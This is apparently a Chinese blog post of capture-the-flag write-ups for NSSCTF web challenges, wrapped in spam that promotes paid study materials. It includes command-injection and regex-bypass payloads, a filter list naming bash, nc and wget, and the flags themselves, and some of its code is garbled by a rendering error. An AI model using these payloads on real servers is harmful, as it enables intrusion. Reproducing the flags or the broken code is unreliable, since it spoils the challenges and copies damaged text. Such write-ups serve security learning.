NSSCTF之Web篇刷题记录(12)(2)

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

$guess = (string) $\_POST['guess'];
if ($guess === $secret) {
    $message = 'Congratulations! The flag is: ' . $flag;
} else {
    $message = 'Wrong. Try Again';
}

}

if (preg_match(‘/utils.php/*$/i’, $_SERVER[‘PHP_SELF’])) {
exit(“hacker 😃”);
}

if (preg_match(‘/show_source/’, $_SERVER[‘REQUEST_URI’])){
exit(“hacker 😃”);
}

if (isset(KaTeX parse error: Expected '}', got 'EOF' at end of input: …_file(basename(_SERVER[‘PHP_SELF’]));
exit();
}else{
show_source(__FILE__);
}
?>


**分析一下代码`$_SERVE[‘PHP_SELF’]` 调用的脚本的路径**  
 **`$_SERVER[‘REQUEST_URI’]`取得当前URI,也就是除域名外后面的完整的地址路径**  
 **[`basename`](https://bbs.csdn.net/topics/618540462)函数: 返回路径中的文件名部分。**


![在这里插入图片描述](https://img-blog.csdnimg.cn/61e88bd8f13e4f0ab2df2d0db0e02348.png)  
 **现在需要绕过`preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']`和正则 只要在`php\`后面加一个非`ascll`码就行比如汉字 由于`preg_match`正则匹配,我们不能直接输入`show_source=‘’` 所以可以将`show_source`变为`show[source`**  
 **绕过`preg_match`正则方法是,在 `index.php/utils.php`后面添加一个非`ascii`表中的字符(很多都可以)**



> 
> `payload:/index.php/utils.php/巧克力?show[source=1`
> 
> 
> 


![**加粗样式**](https://img-blog.csdnimg.cn/6f4e6697c37c4c32a66b4ef09507f35f.png)



> 
> `NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}`
> 
> 
> 


### [NSSCTF 2022 Spring Recruit]ezgame:


**玩游戏`65`分给你`flag`(懒得玩)提示给的是`js`所以我们找一下,在`js/preload.js`中找到`FLAG`。**


![在这里插入图片描述](https://img-blog.csdnimg.cn/f300386a3f1946f49a71530cf413f7e6.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/77569eb3c6c5429fbeb4527986f4a2bf.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f2acaccc9fee4107915b693e128bd65d.png)



> 
> `NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}`
> 
> 
> 


### [GXYCTF 2019]Ping Ping Ping:


**这题之前讲过可以参考链接**:<https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501>



Payload:?ip=127.0.0.1;cat$IFS$9ls


![在这里插入图片描述](https://img-blog.csdnimg.cn/5184eda5510a4405bf48b1b5dca41161.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/1c68f39ef32d437ea237a4c9347fdc8c.png)



> 
> `NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}`
> 
> 
> 


### [SWPUCTF 2021 新生赛]finalrce:


![在这里插入图片描述](https://img-blog.csdnimg.cn/0048b4ca74564abf854208bf82be6e47.png)



<?php highlight\_file(\_\_FILE\_\_); if(isset($\_GET['url'])) { $url=$\_GET['url']; if(preg\_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\\*|\"|\>|\<|\%|\$/i',$url)) { echo "Sorry,you can't use this."; } else { echo "Can you see anything?"; exec($url); } } ``` **`preg_match` 函数用于执行一个正则表达式匹配,这里看到基本上过滤了很多命令`cat,ls`这种都不能使用了 可以使用`tee`命令** **由于`ls`正则表达被过滤,所以我们还需要绕过`preg_match` 可以使用反斜杠`(\)`转义字符** **这里的`tee`功能是从标准输入读取,再写入标准输出和文件 `Payload:?url=l\s / |tee 1.txt` 然后访问`1.txt`看到`flllllaaaaaaggggggg`** ![在这里插入图片描述](https://img-blog.csdnimg.cn/9a2292bf4c444884adf0abbc8a91307e.png) **`tac`没有被过滤然后直接 构造`Payload:?url=tac /flllll\aaaaaaggggggg | tee 9.txt (`记得|后面要空格)在访问`9.txt`** ![在这里插入图片描述](https://img-blog.csdnimg.cn/4f597adb1d9140c79346b858da8ce4b6.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/c83299fa72424ad883d540694ad449b8.png) > > `NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}` > > > ### [NISACTF 2022]checkin: **提示:尝试复制源码看看->`010editor`** **识别到`Unicode`特殊字符复制到`VScode`中 复制下来`URLencode`编码一下** ![在这里插入图片描述](https://img-blog.csdnimg.cn/e53f4c4a532d4fc5b48c36d560d1012a.png) ``` Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF ``` ![在这里插入图片描述](https://img-blog.csdnimg.cn/611ee0f89e0843dea57f3e71bc50591b.png) > > `NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}` > > > ### [UUCTF 2022 新生赛]websign: ![在这里插入图片描述](https://img-blog.csdnimg.cn/655f8b1f50fb45f7972cc4ca2c88932f.png) ### [GDOUCTF 2023]hate eat snake: **通过即可得到flag 或者先G几次 然后点取消,等六十秒左右,再按空格就会出flag** ![在这里插入图片描述](https://img-blog.csdnimg.cn/10a35e932dcb48859d04dab66351af38.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/05669df05f314b1fb792d73a95dbaeba.png) ### [HNCTF 2022 Week1]2048: **很经典的一个游戏了直接`F12`查看源代码 找到`js` 进去查看`alert()`输出复制到控制台运行即可。** ![在这里插入图片描述](https://img-blog.csdnimg.cn/7edbf60ad0b54112a547ebb36ca8bec2.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/8ab73ac9698c4f21b8849d1c67bbed2d.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/e2171c573cae49ceb5fa9808caae0e00.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/c5f53484df824321b8ca5a2c721ea32d.png) **先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7** **深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!** **因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。** ![img](https://img-blog.csdnimg.cn/img_convert/4cf1688858725008055fce988ef80bc3.png) ![img](https://img-blog.csdnimg.cn/img_convert/47ca1171ac3203e3c348f44ebaadbac7.png) ![img](https://img-blog.csdnimg.cn/img_convert/d635960dd6141077dfb9bd5136872539.png) ![img](https://img-blog.csdnimg.cn/img_convert/dd7ee19733a2ad616f3321f8fe76aee8.png) ![img](https://img-blog.csdnimg.cn/img_convert/1d53f1283260b7cc1292be86ae67e590.png) ![img](https://img-blog.csdnimg.cn/img_convert/af96e02bbf8918d60c91bf76547d9725.png) **既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!** **需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)** **由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新** **[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)** 合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!** **需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)** **由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新** **[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
  • 13
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值